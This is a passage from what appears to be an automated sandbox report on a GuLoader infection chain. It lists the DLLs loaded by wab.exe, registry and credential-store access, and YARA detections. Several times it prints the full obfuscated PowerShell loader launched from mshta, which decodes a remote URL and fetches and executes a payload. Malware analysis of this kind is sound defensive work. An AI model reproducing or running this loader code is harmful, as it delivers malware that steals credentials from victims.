              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2590121491.000000000831A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2587009002.0000000007134000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: mshta.exe, 00000000.00000003.1998389233.0000000008651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1995220103.00000000085CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2587009002.0000000007146000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeKug source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Syvaarsdrenge)$global:Saamaskines = [System.Text.Encoding]::ASCII.GetString($Decompressive)$global:Economization=$Saamaskines.substring(324810,27925)<#Arvings lactoside Delagtiggres
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Gnags $Prevailingly $Turboladningernes), (Begrdes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sveskerne = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Navigationsskolen)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Weaned, $false).DefineType($Broadside,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Syvaarsdrenge)$global:Saamaskines = [System.Text.Encoding]::ASCII.GetString($Decompressive)$global:Economization=$Saamaskines.substring(324810,27925)<#Arvings lactoside Delagtiggres
              Suspicious powershell command line found
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teSJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teSJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D90E75 push esi; iretd 1_2_02D90E9A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02D93A64 push ebx; retf 1_2_02D93ADA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_075D6B05 push 0000C33Dh; ret 1_2_075D6B4B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_075D08C2 push eax; mov dword ptr [esp], ecx1_2_075D0AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22CA1E0F push ds; retf 0022h10_2_22CA1E12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22CA1219 push esp; iretd 10_2_22CA121A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22CA1E2C push ds; retf 0022h10_2_22CA1E32
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92806 push ecx; ret 10_2_22C92819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22CA1DFD push ds; retf 0022h10_2_22CA1DFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC228D push cs; iretd 10_2_03AC224C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC2A15 pushad ; ret 10_2_03AC2A16
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC2213 push cs; iretd 10_2_03AC224C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC424A push ecx; iretd 10_2_03AC4255
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC21BE push cs; iretd 10_2_03AC224C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC45EA push edi; iretd 10_2_03AC45ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC0D00 push 929B4AF7h; retf 10_2_03AC0D31
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC04B0 push ecx; iretd 10_2_03AC0515
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03AC341A push cs; ret 10_2_03AC341B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044693D push ecx; ret 16_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00451D54 push eax; ret 16_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
